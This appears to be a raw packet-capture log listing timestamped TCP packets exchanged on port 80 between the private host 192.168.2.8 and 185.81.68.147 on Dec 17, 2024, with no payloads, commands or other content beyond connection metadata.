                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.792546988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.792623043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.793354988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.793504000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.793581963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.794219971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.794348955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.795178890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.795272112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.795348883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.795348883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.796175957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.796334982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.797082901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.797312975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.797447920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.797950029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.798106909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.798238993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.798310995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.799017906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.799154997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.799226999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.799974918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.800195932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.800266027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.800901890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.801001072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.801074028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.801827908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.847951889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.944520950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.944574118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.944694042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.944948912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.945055962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.945142984 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.945852995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.945944071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.946129084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.946793079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.946913958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.946993113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.947742939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.947843075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.948193073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.948693037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.948841095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.949031115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.949642897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.949793100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.949954033 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.950680017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.950746059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.950830936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.951540947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.951678038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.951853991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.952495098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.952629089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.952893019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.953455925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.953567982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.953654051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.954397917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.954516888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.954606056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.955389023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.955504894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.955576897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.956329107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.956460953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.956640005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.957276106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.957374096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.957557917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.958223104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.958276987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.141777992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.141792059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.141949892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.142693043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.142853975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.142992973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.143606901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.143747091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.143942118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.144728899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.144742012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.144859076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.145649910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.145663023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.145796061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.146624088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.146640062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.146738052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.147763968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.147777081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.148156881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.148716927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.148910999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.148931980 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.149374962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.149432898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.149527073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.150337934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.150501966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.150621891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.150635004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.150660992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.150660992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.151406050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.151504993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.151797056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.154155016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.154170036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.154912949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.154925108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.154927969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.155071020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.155096054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.155188084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.155273914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.156071901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.156164885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.156244993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.157174110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.157186985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.157634974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.157999992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.158169985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.158190966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.158967972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.158981085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.159337997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.159739017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.159873009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.160069942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.160861969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.161020041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.161034107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.161688089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.161751986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.161858082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.162638903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.162764072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.162805080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.163656950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.163669109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.163897991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.163903952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.164031982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.164071083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.164758921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.164875984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.164968967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.165719986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.165793896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.165802002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.166596889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.166651964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.166672945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.167567968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.167675018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.168540955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.168621063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.168621063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.168662071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.169456005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.169550896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.169668913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.170404911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.170514107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.170536995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.171441078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.171488047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.354661942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.355221033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.355359077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.355405092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.356389046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.356401920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.356452942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.357409000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.357564926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.357702971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.358485937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.358572006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.358766079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.359060049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.359208107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.359318018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.360009909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.360102892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.360148907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.361093044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.361104965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.361211061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.361989975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.362001896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.362195969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.362984896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.362997055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.363245964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.363873005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.363944054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.364037037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.364746094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.364841938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.364931107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.365793943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.365804911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.365878105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.367031097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.367043018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.367109060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.367643118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.367801905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.367886066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.368673086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.368699074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.368818045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.369755030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.369766951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.369946957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.370740891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.370753050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.371573925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.371675968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.371726036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.371809006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.372567892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.372579098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.372747898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.373686075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.373697996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.373830080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.374371052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.374444008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.374500036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.375379086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.375442982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.375581026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.376569986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.376583099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.376785040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.377141953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.377238035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.377305031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.378413916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.378426075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.378514051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.379030943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.426173925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.521418095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.521517038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.521933079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.521956921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.522471905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.522630930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.523370981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.523384094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.523427010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.523930073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.523946047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.524195910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.524632931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.524843931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.524979115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.525630951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.526002884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.526093960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.526721001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.526731968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.568414927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.568527937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.568624020 CET4970980192.168.2.8185.81.68.147
